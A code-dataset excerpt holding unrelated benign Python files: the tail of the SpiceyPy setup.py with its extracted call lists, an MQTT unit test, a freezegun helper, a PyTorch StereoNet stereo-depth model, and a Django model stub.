InstallCSpice.build_library()
# Move to correct location (root of the distribution)
InstallCSpice.move_to_root_directory()
@staticmethod
def windows_method():
if os.path.exists(os.path.join(cspice_dir, "lib", "cspice.dll")):
print("Found pre-made cspice.dll, not building")
elif os.path.exists(os.path.join(root_dir, 'spiceypy', 'utils', 'cspice.dll')):
print("Found pre-made cspice.dll in spiceypy, not building")
else:
# Build the DLL
InstallCSpice.build_library()
# Move to correct location (root of the distribution)
InstallCSpice.move_to_root_directory()
class SpiceyPyBinaryDistribution(Distribution):
def is_pure(self):
return False
def root_is_pure(self):
return False
class PyTest(TestCommand):
# py.test integration from pytest.org
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errcode = pytest.main(self.test_args)
sys.exit(errcode)
class InstallSpiceyPy(install):
"""Class that extends the install command and encapsulates the
process for installing the required CSPICE distribution at the
right place.
"""
def finalize_options(self):
install.finalize_options(self)
self.install_lib = self.install_platlib
def run(self):
InstallCSpice.get_cspice()
install.run(self)
class GetCSPICECommand(Command):
""" Custom command to get the correct cspice and build the shared library for spiceypy """
description = 'downloads cspice and builds the shared library'
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
InstallCSpice.get_cspice()
class BuildPyCommand(build_py):
""" Custom build command to ensure cspice is built and packaged """
def run(self):
InstallCSpice.get_cspice()
build_py.run(self)
cmdclass = { 'install': InstallSpiceyPy,
'test': PyTest,
'build_py': BuildPyCommand,
'get_cspice': GetCSPICECommand }
# https://stackoverflow.com/questions/45150304/how-to-force-a-python-wheel-to-be-platform-specific-when-building-it
# http://lepture.com/en/2014/python-on-a-hard-wheel
try:
from wheel.bdist_wheel import bdist_wheel
print("Wheel is Present")
class _bdist_wheel(bdist_wheel):
def finalize_options(self):
bdist_wheel.finalize_options(self)
self.root_is_pure = False
def get_tag(self):
# TODO: since I use six, in future consider replacing first two tags with py2.py3 and none
tag = bdist_wheel.get_tag(self)
repl = 'macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64.macosx_10_10_intel.macosx_10_10_x86_64'
if 'macosx_10' in tag[2]:
tag = (tag[0], tag[1], repl)
return tag
# add our override to the cmdclass dict so we can inject this behavior
cmdclass['bdist_wheel'] = _bdist_wheel
except ImportError:
# we don't have wheel installed so there is nothing to change
print("Wheel is not installed...")
pass
readme = open('README.rst', 'r')
readmetext = readme.read()
readme.close()
setup(
name='spiceypy',
version='2.2.1',
license='MIT',
author='<NAME>',
author_email='<EMAIL>',
description='A Python Wrapper for the NAIF CSPICE Toolkit',
long_description=readmetext,
python_requires='>=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, <4',
keywords=['spiceypy', 'spice', 'naif', 'jpl', 'space', 'geometry'],
url='https://github.com/AndrewAnnex/SpiceyPy',
classifiers=[
"Development Status :: 5 - Production/Stable",
"Natural Language :: English",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Astronomy",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Operating System :: MacOS :: MacOS X",
"Operating System :: POSIX :: Linux",
"Operating System :: POSIX :: BSD :: FreeBSD",
"Operating System :: Microsoft :: Windows"
],
packages=['spiceypy', 'spiceypy.utils'],
include_package_data=True,
zip_safe=False,
distclass=SpiceyPyBinaryDistribution,
package_data={'spiceypy': ['utils/*.so', "utils/*.dll"]},
setup_requires=DEPENDENCIES,
install_requires=DEPENDENCIES,
requires=REQUIRES,
tests_require=TEST_DEPENDENCIES,
cmdclass=cmdclass,
test_suite='spiceypy.tests.test_wrapper.py',
extras_require={'testing': ['pytest']}
)
|
[
"getspice.GetCSPICE",
"setuptools.command.install.install.finalize_options",
"wheel.bdist_wheel.bdist_wheel.get_tag",
"pytest.main",
"os.path.isfile",
"setuptools.command.install.install.run",
"os.path.join",
"os.chdir",
"shutil.copy",
"os.waitpid",
"os.path.exists",
"subprocess.Popen",
"os.path.realpath",
"os.rename",
"platform.system",
"sys.exit",
"setuptools.setup",
"wheel.bdist_wheel.bdist_wheel.finalize_options",
"os.getcwd",
"setuptools.command.test.test.finalize_options",
"setuptools.command.build_py.build_py.run"
] |
[((1458, 1475), 'platform.system', 'platform.system', ([], {}), '()\n', (1473, 1475), False, 'import platform\n'), ((1703, 1735), 'os.path.join', 'os.path.join', (['root_dir', '"""cspice"""'], {}), "(root_dir, 'cspice')\n", (1715, 1735), False, 'import os\n'), ((1787, 1818), 'os.path.join', 'os.path.join', (['cspice_dir', '"""lib"""'], {}), "(cspice_dir, 'lib')\n", (1799, 1818), False, 'import os\n'), ((11268, 12691), 'setuptools.setup', 'setup', ([], {'name': '"""spiceypy"""', 'version': '"""2.2.1"""', 'license': '"""MIT"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'description': '"""A Python Wrapper for the NAIF CSPICE Toolkit"""', 'long_description': 'readmetext', 'python_requires': '""">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, <4"""', 'keywords': "['spiceypy', 'spice', 'naif', 'jpl', 'space', 'geometry']", 'url': '"""https://github.com/AndrewAnnex/SpiceyPy"""', 'classifiers': "['Development Status :: 5 - Production/Stable',\n 'Natural Language :: English', 'Topic :: Scientific/Engineering',\n 'Topic :: Scientific/Engineering :: Astronomy',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Operating System :: MacOS :: MacOS X',\n 'Operating System :: POSIX :: Linux',\n 'Operating System :: POSIX :: BSD :: FreeBSD',\n 'Operating System :: Microsoft :: Windows']", 'packages': "['spiceypy', 'spiceypy.utils']", 'include_package_data': '(True)', 'zip_safe': '(False)', 'distclass': 'SpiceyPyBinaryDistribution', 'package_data': "{'spiceypy': ['utils/*.so', 'utils/*.dll']}", 'setup_requires': 'DEPENDENCIES', 'install_requires': 'DEPENDENCIES', 'requires': 'REQUIRES', 'tests_require': 'TEST_DEPENDENCIES', 'cmdclass': 'cmdclass', 'test_suite': '"""spiceypy.tests.test_wrapper.py"""', 'extras_require': "{'testing': ['pytest']}"}), "(name='spiceypy', version='2.2.1', license='MIT', author='<NAME>',\n author_email='<EMAIL>', description=\n 'A Python Wrapper for the NAIF CSPICE Toolkit', long_description=\n readmetext, python_requires=\n '>=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, <4', keywords=[\n 'spiceypy', 'spice', 'naif', 'jpl', 'space', 'geometry'], url=\n 'https://github.com/AndrewAnnex/SpiceyPy', classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Natural Language :: English', 'Topic :: Scientific/Engineering',\n 'Topic :: Scientific/Engineering :: Astronomy',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Operating System :: MacOS :: MacOS X',\n 'Operating System :: POSIX :: Linux',\n 'Operating System :: POSIX :: BSD :: FreeBSD',\n 'Operating System :: Microsoft :: Windows'], packages=['spiceypy',\n 'spiceypy.utils'], include_package_data=True, zip_safe=False, distclass\n =SpiceyPyBinaryDistribution, package_data={'spiceypy': ['utils/*.so',\n 'utils/*.dll']}, setup_requires=DEPENDENCIES, install_requires=\n DEPENDENCIES, requires=REQUIRES, tests_require=TEST_DEPENDENCIES,\n cmdclass=cmdclass, test_suite='spiceypy.tests.test_wrapper.py',\n extras_require={'testing': ['pytest']})\n", (11273, 12691), False, 'from setuptools import setup, Command\n'), ((1625, 1651), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (1641, 1651), False, 'import os\n'), ((5073, 5084), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (5082, 5084), False, 'import os\n'), ((6752, 6765), 'os.chdir', 'os.chdir', (['cwd'], {}), '(cwd)\n', (6760, 6765), False, 'import os\n'), ((6901, 6955), 'os.path.join', 'os.path.join', (['root_dir', '"""spiceypy"""', '"""utils"""', 'sharedlib'], {}), "(root_dir, 'spiceypy', 'utils', sharedlib)\n", (6913, 6955), False, 'import os\n'), ((8808, 8842), 'setuptools.command.test.test.finalize_options', 'TestCommand.finalize_options', (['self'], {}), '(self)\n', (8836, 8842), True, 'from setuptools.command.test import test as TestCommand\n'), ((8968, 8995), 'pytest.main', 'pytest.main', (['self.test_args'], {}), '(self.test_args)\n', (8979, 8995), False, 'import pytest\n'), ((9004, 9021), 'sys.exit', 'sys.exit', (['errcode'], {}), '(errcode)\n', (9012, 9021), False, 'import sys\n'), ((9256, 9286), 'setuptools.command.install.install.finalize_options', 'install.finalize_options', (['self'], {}), '(self)\n', (9280, 9286), False, 'from setuptools.command.install import install\n'), ((9398, 9415), 'setuptools.command.install.install.run', 'install.run', (['self'], {}), '(self)\n', (9409, 9415), False, 'from setuptools.command.install import install\n'), ((9951, 9969), 'setuptools.command.build_py.build_py.run', 'build_py.run', (['self'], {}), '(self)\n', (9963, 9969), False, 'from setuptools.command.build_py import build_py\n'), ((2910, 2936), 'os.path.exists', 'os.path.exists', (['cspice_dir'], {}), '(cspice_dir)\n', (2924, 2936), False, 'import os\n'), ((3165, 3200), 'getspice.GetCSPICE', 'getspice.GetCSPICE', ([], {'version': '"""N0066"""'}), "(version='N0066')\n", (3183, 3200), False, 'import getspice\n'), ((3501, 3576), 'os.path.join', 'os.path.join', (['lib_dir', "('cspice.lib' if host_OS is 'Windows' else 'cspice.a')"], {}), "(lib_dir, 'cspice.lib' if host_OS is 'Windows' else 'cspice.a')\n", (3513, 3576), False, 'import os\n'), ((3606, 3685), 'os.path.join', 'os.path.join', (['lib_dir', "('csupport.lib' if host_OS is 'Windows' else 'csupport.a')"], {}), "(lib_dir, 'csupport.lib' if host_OS is 'Windows' else 'csupport.a')\n", (3618, 3685), False, 'import os\n'), ((6971, 6998), 'os.path.isfile', 'os.path.isfile', (['destination'], {}), '(destination)\n', (6985, 6998), False, 'import os\n'), ((8083, 8128), 'os.path.join', 'os.path.join', (['cspice_dir', '"""lib"""', '"""cspice.dll"""'], {}), "(cspice_dir, 'lib', 'cspice.dll')\n", (8095, 8128), False, 'import os\n'), ((10466, 10500), 'wheel.bdist_wheel.bdist_wheel.finalize_options', 'bdist_wheel.finalize_options', (['self'], {}), '(self)\n', (10494, 10500), False, 'from wheel.bdist_wheel import bdist_wheel\n'), ((10688, 10713), 'wheel.bdist_wheel.bdist_wheel.get_tag', 'bdist_wheel.get_tag', (['self'], {}), '(self)\n', (10707, 10713), False, 'from wheel.bdist_wheel import bdist_wheel\n'), ((3220, 3246), 'os.path.exists', 'os.path.exists', (['cspice_dir'], {}), '(cspice_dir)\n', (3234, 3246), False, 'import os\n'), ((3349, 3366), 'sys.exit', 'sys.exit', (['message'], {}), '(message)\n', (3357, 3366), False, 'import sys\n'), ((3704, 3730), 'os.path.exists', 'os.path.exists', (['cspice_lib'], {}), '(cspice_lib)\n', (3718, 3730), False, 'import os\n'), ((3735, 3763), 'os.path.exists', 'os.path.exists', (['csupport_lib'], {}), '(csupport_lib)\n', (3749, 3763), False, 'import os\n'), ((3787, 3798), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (3796, 3798), False, 'import os\n'), ((4947, 4970), 'sys.exit', 'sys.exit', (['error_Message'], {}), '(error_Message)\n', (4955, 4970), False, 'import sys\n'), ((5139, 5156), 'os.chdir', 'os.chdir', (['lib_dir'], {}), '(lib_dir)\n', (5147, 5156), False, 'import os\n'), ((5279, 5348), 'subprocess.Popen', 'subprocess.Popen', (['"""gcc -shared -fPIC -lm *.o -o spice.so"""'], {'shell': '(True)'}), "('gcc -shared -fPIC -lm *.o -o spice.so', shell=True)\n", (5295, 5348), False, 'import subprocess\n'), ((7049, 7091), 'os.path.join', 'os.path.join', (['cspice_dir', '"""lib"""', 'sharedlib'], {}), "(cspice_dir, 'lib', sharedlib)\n", (7061, 7091), False, 'import os\n'), ((7135, 7187), 'os.path.join', 'os.path.join', (['cspice_dir', '"""src"""', '"""cspice"""', 'sharedlib'], {}), "(cspice_dir, 'src', 'cspice', sharedlib)\n", (7147, 7187), False, 'import os\n'), ((7304, 7334), 'os.rename', 'os.rename', (['target', 'destination'], {}), '(target, destination)\n', (7313, 7334), False, 'import os\n'), ((8220, 8277), 'os.path.join', 'os.path.join', (['root_dir', '"""spiceypy"""', '"""utils"""', '"""cspice.dll"""'], {}), "(root_dir, 'spiceypy', 'utils', 'cspice.dll')\n", (8232, 8277), False, 'import os\n'), ((3840, 3857), 'os.chdir', 'os.chdir', (['lib_dir'], {}), '(lib_dir)\n', (3848, 3857), False, 'import os\n'), ((4762, 4775), 'os.chdir', 'os.chdir', (['cwd'], {}), '(cwd)\n', (4770, 4775), False, 'import os\n'), ((5374, 5402), 'os.waitpid', 'os.waitpid', (['build_lib.pid', '(0)'], {}), '(build_lib.pid, 0)\n', (5384, 5402), False, 'import os\n'), ((5970, 6011), 'os.path.join', 'os.path.join', (['cspice_dir', '"""src"""', '"""cspice"""'], {}), "(cspice_dir, 'src', 'cspice')\n", (5982, 6011), False, 'import os\n'), ((6038, 6086), 'os.path.join', 'os.path.join', (['root_dir', '"""appveyor"""', '"""cspice.def"""'], {}), "(root_dir, 'appveyor', 'cspice.def')\n", (6050, 6086), False, 'import os\n'), ((6113, 6171), 'os.path.join', 'os.path.join', (['root_dir', '"""appveyor"""', '"""makeDynamicSpice.bat"""'], {}), "(root_dir, 'appveyor', 'makeDynamicSpice.bat')\n", (6125, 6171), False, 'import os\n'), ((6188, 6221), 'shutil.copy', 'shutil.copy', (['defFile', 'destination'], {}), '(defFile, destination)\n', (6199, 6221), False, 'import shutil\n'), ((6238, 6271), 'shutil.copy', 'shutil.copy', (['makeBat', 'destination'], {}), '(makeBat, destination)\n', (6249, 6271), False, 'import shutil\n'), ((6321, 6342), 'os.chdir', 'os.chdir', (['destination'], {}), '(destination)\n', (6329, 6342), False, 'import os\n'), ((6375, 6427), 'subprocess.Popen', 'subprocess.Popen', (['"""makeDynamicSpice.bat"""'], {'shell': '(True)'}), "('makeDynamicSpice.bat', shell=True)\n", (6391, 6427), False, 'import subprocess\n'), ((7583, 7594), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (7592, 7594), False, 'import os\n'), ((5554, 5565), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (5563, 5565), False, 'import os\n'), ((4154, 4187), 'subprocess.Popen', 'subprocess.Popen', (['lib'], {'shell': '(True)'}), '(lib, shell=True)\n', (4170, 4187), False, 'import subprocess\n'), ((4233, 4270), 'os.waitpid', 'os.waitpid', (['unpack_lib_process.pid', '(0)'], {}), '(unpack_lib_process.pid, 0)\n', (4243, 4270), False, 'import os\n')]
|
'''
Tests MQTT functionality.
'''
import unittest
from unittest.mock import patch
from modules import rec_mqtt
class DummyMessage: # pylint: disable=R0903
'''Creating a mock response'''
def __init__(self, command):
self.payload=command
topic='test_hub'
class TestOnMessage(unittest.TestCase):
'''unit tests for the MQTT module'''
def test_function_calls(self):
'''
Checks that the function calls are correct.
'''
with patch('modules.rec_mqtt.rec_api.link_hub') as mock_link:
self.assertTrue(
rec_mqtt.on_message('test_client', None, DummyMessage('170'))
)
mock_link.assert_called()
with patch('modules.rec_mqtt.rec_api.pull_data_dump') as mock_pull:
rec_mqtt.on_message('test_client', None, DummyMessage('186'))
mock_pull.assert_called()
with patch('modules.rec_mqtt.mqtt_start_update') as mock_update:
rec_mqtt.on_message('test_client', None, DummyMessage('202'))
mock_update.assert_called()
with patch('modules.rec_mqtt.rec_api.update_time_zone') as mock_timezone:
rec_mqtt.on_message('test_client', None, DummyMessage('218'))
mock_timezone.assert_called()
with patch('modules.rec_mqtt.mqtt_restart_system') as mock_restart:
rec_mqtt.on_message('test_client', None, DummyMessage('234'))
mock_restart.assert_called()
with patch('modules.rec_mqtt.zip_send') as mock_zip:
rec_mqtt.on_message('test_client', None, DummyMessage('250'))
mock_zip.assert_called()
|
[
"unittest.mock.patch"
] |
[((517, 559), 'unittest.mock.patch', 'patch', (['"""modules.rec_mqtt.rec_api.link_hub"""'], {}), "('modules.rec_mqtt.rec_api.link_hub')\n", (522, 559), False, 'from unittest.mock import patch\n'), ((747, 795), 'unittest.mock.patch', 'patch', (['"""modules.rec_mqtt.rec_api.pull_data_dump"""'], {}), "('modules.rec_mqtt.rec_api.pull_data_dump')\n", (752, 795), False, 'from unittest.mock import patch\n'), ((936, 979), 'unittest.mock.patch', 'patch', (['"""modules.rec_mqtt.mqtt_start_update"""'], {}), "('modules.rec_mqtt.mqtt_start_update')\n", (941, 979), False, 'from unittest.mock import patch\n'), ((1124, 1174), 'unittest.mock.patch', 'patch', (['"""modules.rec_mqtt.rec_api.update_time_zone"""'], {}), "('modules.rec_mqtt.rec_api.update_time_zone')\n", (1129, 1174), False, 'from unittest.mock import patch\n'), ((1323, 1368), 'unittest.mock.patch', 'patch', (['"""modules.rec_mqtt.mqtt_restart_system"""'], {}), "('modules.rec_mqtt.mqtt_restart_system')\n", (1328, 1368), False, 'from unittest.mock import patch\n'), ((1515, 1549), 'unittest.mock.patch', 'patch', (['"""modules.rec_mqtt.zip_send"""'], {}), "('modules.rec_mqtt.zip_send')\n", (1520, 1549), False, 'from unittest.mock import patch\n')]
|
from functools import wraps
from nose.plugins import skip
from freezegun.api import FakeDate, FakeDatetime, _is_cpython
def is_fake_date(obj):
return obj.__class__ is FakeDate
def is_fake_datetime(obj):
return obj.__class__ is FakeDatetime
def cpython_only(func):
@wraps(func)
def wrapper(*args):
if not _is_cpython:
raise skip.SkipTest("Requires CPython")
return func(*args)
return wrapper
|
[
"nose.plugins.skip.SkipTest",
"functools.wraps"
] |
[((285, 296), 'functools.wraps', 'wraps', (['func'], {}), '(func)\n', (290, 296), False, 'from functools import wraps\n'), ((367, 400), 'nose.plugins.skip.SkipTest', 'skip.SkipTest', (['"""Requires CPython"""'], {}), "('Requires CPython')\n", (380, 400), False, 'from nose.plugins import skip\n')]
|
# ------------------------------------------------------------------------------
# Copyright (c) NKU
# Licensed under the MIT License.
# Written by <NAME> (<EMAIL>)
# ------------------------------------------------------------------------------
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import torch.backends.cudnn as cudnn
def convbn(in_channel, out_channel, kernel_size, stride, pad, dilation):
return nn.Sequential(
nn.Conv2d(
in_channel,
out_channel,
kernel_size=kernel_size,
stride=stride,
padding=dilation if dilation>1 else pad,
dilation=dilation),
nn.BatchNorm2d(out_channel))
def convbn_3d(in_channel, out_channel, kernel_size, stride, pad):
return nn.Sequential(
nn.Conv3d(
in_channel,
out_channel,
kernel_size=kernel_size,
padding=pad,
stride=stride),
nn.BatchNorm3d(out_channel))
class BasicBlock(nn.Module):
def __init__(self, in_channel, out_channel, stride, downsample, pad, dilation):
super().__init__()
self.conv1 = nn.Sequential(
convbn(in_channel, out_channel, 3, stride, pad, dilation),
nn.LeakyReLU(negative_slope=0.2, inplace=True))
self.conv2 = convbn(out_channel, out_channel, 3, 1, pad, dilation)
self.downsample = downsample
self.stride = stride
def forward(self, x):
out = self.conv1(x)
# out = self.conv2(out)
if self.downsample is not None:
x = self.downsample(x)
### bug?
out = x + out
return out
class FeatureExtraction(nn.Module):
def __init__(self, k):
super().__init__()
self.k = k
self.downsample = nn.ModuleList()
in_channel = 3
out_channel = 32
for _ in range(k):
self.downsample.append(
nn.Conv2d(
in_channel,
out_channel,
kernel_size=5,
stride=2,
padding=2))
in_channel = out_channel
out_channel = 32
self.residual_blocks = nn.ModuleList()
for _ in range(6):
self.residual_blocks.append(
BasicBlock(
32, 32, stride=1, downsample=None, pad=1, dilation=1))
self.conv_alone = nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=1)
def forward(self, rgb_img):
output = rgb_img
for i in range(self.k):
output = self.downsample[i](output)
for block in self.residual_blocks:
output = block(output)
return self.conv_alone(output)
class EdgeAwareRefinement(nn.Module):
def __init__(self, in_channel):
super().__init__()
self.conv2d_feature = nn.Sequential(
convbn(in_channel, 32, kernel_size=3, stride=1, pad=1, dilation=1),
nn.LeakyReLU(negative_slope=0.2, inplace=True))
self.residual_astrous_blocks = nn.ModuleList()
astrous_list = [1, 2, 4, 8 , 1 , 1]
for di in astrous_list:
self.residual_astrous_blocks.append(
BasicBlock(
32, 32, stride=1, downsample=None, pad=1, dilation=di))
self.conv2d_out = nn.Conv2d(32, 1, kernel_size=3, stride=1, padding=1)
def forward(self, low_disparity, corresponding_rgb):
output = torch.unsqueeze(low_disparity, dim=1)
twice_disparity = F.interpolate(
output,
size = corresponding_rgb.size()[-2:],
mode='bilinear',
align_corners=False)
if corresponding_rgb.size()[-1]/ low_disparity.size()[-1] >= 1.5:
twice_disparity *= 2 # ??????
# print(corresponding_rgb.size()[-1]// low_disparity.size()[-1])
output = self.conv2d_feature(
torch.cat([twice_disparity, corresponding_rgb], dim=1))
for astrous_block in self.residual_astrous_blocks:
output = astrous_block(output)
return nn.ReLU(inplace=True)(torch.squeeze(
twice_disparity + self.conv2d_out(output), dim=1))
class disparityregression(nn.Module):
def __init__(self, maxdisp):
super().__init__()
self.disp = torch.FloatTensor(
np.reshape(np.array(range(maxdisp)), [1, maxdisp, 1, 1])).cuda()
def forward(self, x):
disp = self.disp.repeat(x.size()[0], 1, x.size()[2], x.size()[3])
out = torch.sum(x * disp, 1)
return out
class StereoNet(nn.Module):
def __init__(self, k, r, maxdisp=192):
super().__init__()
self.maxdisp = maxdisp
self.k = k
self.r = r
self.feature_extraction = FeatureExtraction(k)
self.filter = nn.ModuleList()
for _ in range(4):
self.filter.append(
nn.Sequential(
convbn_3d(32, 32, kernel_size=3, stride=1, pad=1),
nn.LeakyReLU(negative_slope=0.2, inplace=True)))
self.conv3d_alone = nn.Conv3d(
32, 1, kernel_size=3, stride=1, padding=1)
self.edge_aware_refinements = nn.ModuleList()
for _ in range(r):
self.edge_aware_refinements.append(EdgeAwareRefinement(4))
def forward(self, left, right):
disp = (self.maxdisp + 1) // pow(2, self.k)
refimg_feature = self.feature_extraction(left)
targetimg_feature = self.feature_extraction(right)
# matching
cost = torch.FloatTensor(refimg_feature.size()[0],
refimg_feature.size()[1],
disp,
refimg_feature.size()[2],
refimg_feature.size()[3]).zero_().cuda()
for i in range(disp):
if i > 0:
cost[:, :, i, :, i:] = refimg_feature[ :, :, :, i:] - targetimg_feature[:, :, :, :-i]
else:
cost[:, :, i, :, :] = refimg_feature - targetimg_feature
cost = cost.contiguous()
for f in self.filter:
cost = f(cost)
cost = self.conv3d_alone(cost)
cost = torch.squeeze(cost, 1)
pred = F.softmax(cost, dim=1)
pred = disparityregression(disp)(pred)
img_pyramid_list = []
for i in range(self.r):
img_pyramid_list.append(F.interpolate(
left,
scale_factor=1 / pow(2, i),
mode='bilinear',
align_corners=False))
img_pyramid_list.reverse()
pred_pyramid_list= [pred]
for i in range(self.r):
# start = datetime.datetime.now()
pred_pyramid_list.append(self.edge_aware_refinements[i](
pred_pyramid_list[i], img_pyramid_list[i]))
length_all = len(pred_pyramid_list)
for i in range(length_all):
pred_pyramid_list[i] = pred_pyramid_list[i]* (
left.size()[-1] / pred_pyramid_list[i].size()[-1])
pred_pyramid_list[i] = torch.squeeze(
F.interpolate(
torch.unsqueeze(pred_pyramid_list[i], dim=1),
size=left.size()[-2:],
mode='bilinear',
align_corners=False),
dim=1)
return pred_pyramid_list
if __name__ == '__main__':
model = StereoNet(k=3, r=3).cuda()
# model.eval()
import time
import datetime
import torch
input = torch.FloatTensor(1,3,540,960).zero_().cuda()
# input = torch.half(1,3,540,960).zero_().cuda()
for i in range(100):
# pass
out = model(input, input)
# print(len(out))
start = datetime.datetime.now()
for i in range(100):
# pass
out = model(input, input)
end = datetime.datetime.now()
print((end-start).total_seconds())
|
[
"torch.nn.BatchNorm3d",
"torch.nn.ReLU",
"torch.nn.ModuleList",
"torch.nn.Conv3d",
"torch.sum",
"torch.nn.Conv2d",
"torch.FloatTensor",
"torch.cat",
"torch.nn.functional.softmax",
"torch.squeeze",
"torch.nn.BatchNorm2d",
"torch.unsqueeze",
"torch.nn.LeakyReLU",
"datetime.datetime.now"
] |
[((7858, 7881), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (7879, 7881), False, 'import datetime\n'), ((7967, 7990), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (7988, 7990), False, 'import datetime\n'), ((482, 622), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channel', 'out_channel'], {'kernel_size': 'kernel_size', 'stride': 'stride', 'padding': '(dilation if dilation > 1 else pad)', 'dilation': 'dilation'}), '(in_channel, out_channel, kernel_size=kernel_size, stride=stride,\n padding=dilation if dilation > 1 else pad, dilation=dilation)\n', (491, 622), True, 'import torch.nn as nn\n'), ((698, 725), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['out_channel'], {}), '(out_channel)\n', (712, 725), True, 'import torch.nn as nn\n'), ((829, 920), 'torch.nn.Conv3d', 'nn.Conv3d', (['in_channel', 'out_channel'], {'kernel_size': 'kernel_size', 'padding': 'pad', 'stride': 'stride'}), '(in_channel, out_channel, kernel_size=kernel_size, padding=pad,\n stride=stride)\n', (838, 920), True, 'import torch.nn as nn\n'), ((986, 1013), 'torch.nn.BatchNorm3d', 'nn.BatchNorm3d', (['out_channel'], {}), '(out_channel)\n', (1000, 1013), True, 'import torch.nn as nn\n'), ((1822, 1837), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (1835, 1837), True, 'import torch.nn as nn\n'), ((2235, 2250), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (2248, 2250), True, 'import torch.nn as nn\n'), ((2448, 2501), 'torch.nn.Conv2d', 'nn.Conv2d', (['(32)', '(32)'], {'kernel_size': '(3)', 'stride': '(1)', 'padding': '(1)'}), '(32, 32, kernel_size=3, stride=1, padding=1)\n', (2457, 2501), True, 'import torch.nn as nn\n'), ((3082, 3097), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (3095, 3097), True, 'import torch.nn as nn\n'), ((3370, 3422), 'torch.nn.Conv2d', 'nn.Conv2d', (['(32)', '(1)'], {'kernel_size': '(3)', 'stride': '(1)', 'padding': '(1)'}), '(32, 1, kernel_size=3, stride=1, padding=1)\n', (3379, 3422), True, 'import torch.nn as nn\n'), ((3498, 3535), 'torch.unsqueeze', 'torch.unsqueeze', (['low_disparity'], {'dim': '(1)'}), '(low_disparity, dim=1)\n', (3513, 3535), False, 'import torch\n'), ((4566, 4588), 'torch.sum', 'torch.sum', (['(x * disp)', '(1)'], {}), '(x * disp, 1)\n', (4575, 4588), False, 'import torch\n'), ((4854, 4869), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (4867, 4869), True, 'import torch.nn as nn\n'), ((5128, 5180), 'torch.nn.Conv3d', 'nn.Conv3d', (['(32)', '(1)'], {'kernel_size': '(3)', 'stride': '(1)', 'padding': '(1)'}), '(32, 1, kernel_size=3, stride=1, padding=1)\n', (5137, 5180), True, 'import torch.nn as nn\n'), ((5241, 5256), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (5254, 5256), True, 'import torch.nn as nn\n'), ((6262, 6284), 'torch.squeeze', 'torch.squeeze', (['cost', '(1)'], {}), '(cost, 1)\n', (6275, 6284), False, 'import torch\n'), ((6300, 6322), 'torch.nn.functional.softmax', 'F.softmax', (['cost'], {'dim': '(1)'}), '(cost, dim=1)\n', (6309, 6322), True, 'import torch.nn.functional as F\n'), ((1275, 1321), 'torch.nn.LeakyReLU', 'nn.LeakyReLU', ([], {'negative_slope': '(0.2)', 'inplace': '(True)'}), '(negative_slope=0.2, inplace=True)\n', (1287, 1321), True, 'import torch.nn as nn\n'), ((2995, 3041), 'torch.nn.LeakyReLU', 'nn.LeakyReLU', ([], {'negative_slope': '(0.2)', 'inplace': '(True)'}), '(negative_slope=0.2, inplace=True)\n', (3007, 3041), True, 'import torch.nn as nn\n'), ((3954, 4008), 'torch.cat', 'torch.cat', (['[twice_disparity, corresponding_rgb]'], {'dim': '(1)'}), '([twice_disparity, corresponding_rgb], dim=1)\n', (3963, 4008), False, 'import torch\n'), ((4136, 4157), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (4143, 4157), True, 'import torch.nn as nn\n'), ((1965, 2035), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channel', 'out_channel'], {'kernel_size': '(5)', 'stride': '(2)', 'padding': '(2)'}), '(in_channel, out_channel, kernel_size=5, stride=2, padding=2)\n', (1974, 2035), True, 'import torch.nn as nn\n'), ((5051, 5097), 'torch.nn.LeakyReLU', 'nn.LeakyReLU', ([], {'negative_slope': '(0.2)', 'inplace': '(True)'}), '(negative_slope=0.2, inplace=True)\n', (5063, 5097), True, 'import torch.nn as nn\n'), ((7278, 7322), 'torch.unsqueeze', 'torch.unsqueeze', (['pred_pyramid_list[i]'], {'dim': '(1)'}), '(pred_pyramid_list[i], dim=1)\n', (7293, 7322), False, 'import torch\n'), ((7645, 7678), 'torch.FloatTensor', 'torch.FloatTensor', (['(1)', '(3)', '(540)', '(960)'], {}), '(1, 3, 540, 960)\n', (7662, 7678), False, 'import torch\n')]
|
from django.db import models
from Apps.usuario.models import usuario
# Create your models here.
class Paciente(usuario):
contrato = models.CharField(max_length=100)
class Meta:
managed = False
db_table = 'paciente'
|
[
"django.db.models.CharField"
] |
